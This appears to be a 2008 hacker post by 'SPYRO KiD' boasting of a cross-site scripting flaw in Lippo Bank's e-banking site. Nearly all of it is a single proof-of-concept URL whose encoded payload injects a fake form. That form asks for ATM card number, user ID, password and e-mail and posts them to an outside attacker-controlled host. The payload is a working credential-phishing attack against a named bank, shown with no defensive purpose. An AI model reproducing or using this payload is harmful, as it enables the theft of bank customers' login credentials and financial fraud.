Lippo Bank Vulnerable to XSS


  • SPYRO KiD
  • admin[~@t~]spyrozone[~d.t~]net
  • Monday, July 21st, 2008
  • CopyLEFT (c) 2011++ www.spyrozone.net All Rights Reserved


{image: ebanking.lippobank.co.id XSSED by SPYRO KiD}

ebanking.lippobank.co.id XSSED by SPYRO KiD

POC:

https://ebanking.lippobank.co.id/Retail/ur_add2.jsp?atm_no=%22%3E%3C/form%3E%3C/TD%3E%3C/TR%3E%3CTR%20CLASS=clsOdd%3E%3CTD%3E%3CFORM%20NAME=%22frmParam%22%20ACTION=%22http://spyrozone.black-it.net/index.php%22%20METHOD=%22POST%22%20AUTOCOMPLETE=%22OFF%22%3EATM%20Card%20Number%20(Confirm):%20%3CFONT%20CLASS=%22clsAsterisk%22%3E*%3C/FONT%3E%3C/TD%3E%3CTD%3E%3CINPUT%20TYPE=%22TEXT%22%20ID=%22atm_no%22%20NAME=%22atm_no%22%20MAXLENGTH=%2216%22%20SIZE=%2216%22%20VALUE=%22%22%20%20%3E%3C/TD%3E%3C/TR%3E%3CTR%20CLASS=clsEven%3E%3CTD%3EUser%20ID:%20%3CFONT%20CLASS=%22clsAsterisk%22%3E*%3C/FONT%3E%3C/TD%3E%3CTD%3E%3CINPUT%20TYPE=%22TEXT%22%20ID=%22user_id%22%20NAME=%22user_id%22%20MAXLENGTH=%229%22%20SIZE=%229%22%20VALUE=%22%22%20%20%3E%20%3C/TD%3E%3C/TR%3E%3CTR%20CLASS=clsOdd%3E%3CTD%3EUser%20Name:%20%3CFONT%20CLASS=%22clsAsterisk%22%3E*%3C/FONT%3E%3C/TD%3E%3CTD%3E%3CINPUT%20TYPE=%22TEXT%22%20ID=%22user_nm%22%20NAME=%22user_nm%22%20MAXLENGTH=%2250%22%20SIZE=%2250%22%20VALUE=%22%22%20%20%3E%20%3C/TD%3E%3C/TR%3E%3CTR%20CLASS=clsEven%3E%3CTD%3EPassword:%20%3CFONT%20CLASS=%22clsAsterisk%22%3E*%3C/FONT%3E%3C/TD%3E%3CTD%3E%3CINPUT%20TYPE=%22PASSWORD%22%20ID=%22password%22%20NAME=%22password%22%20MAXLENGTH=%2212%22%20SIZE=%2212%22%20VALUE=%22%22%20%20%20%3E%20%3C/TD%3E%3C/TR%3E%3CTR%20CLASS=clsOdd%3E%3CTD%3EConfirm%20Password:%20%3CFONT%20CLASS=%22clsAsterisk%22%3E*%3C/FONT%3E%3C/TD%3E%3CTD%3E%3CINPUT%20TYPE=%22PASSWORD%22%20ID=%22confirm_password%22%20NAME=%22confirm_password%22%20MAXLENGTH=%2212%22%20SIZE=%2212%22%20VALUE=%22%22%20%20%20%3E%20%3C/TD%3E%3C/TR%3E%3CTR%20CLASS=clsEven%3E%3CTD%3EE-mail:%20%3CFONT%20CLASS=%22clsAsterisk%22%3E*%3C/FONT%3E%3C/TD%3E%3CTD%3E%3CINPUT%20TYPE=%22TEXT%22%20ID=%22email%22%20NAME=%22email%22%20MAXLENGTH=%2240%22%20SIZE=%2240%22%20VALUE=%22%22%20%20%3E%20%3C/TD%3E%3C/TR%3E%3CTR%20CLASS=%22clsBtnBar%22%3E%3CTD%20COLSPAN=%222%22%20ALIGN=%22right%22%3E%3CINPUT%20TYPE=%22submit%22%20ID=%22Submit%22%20NAME=%22Submit%22%20VALUE=%22Submit%22%20onClick=%22Javascript:onSubmitClick()%22%3E%3CINPUT%20TYPE=%22button%22%20ID=%22Clear%22%20NAME=%22Clear%22%20VALUE=%22Clear%22%3E%3C/TD%3E%3C/TR%3E%3C/TABLE%3E%3C/FORM%3E%3Cscript%3E%3Cnoscript%3E


//E.O.F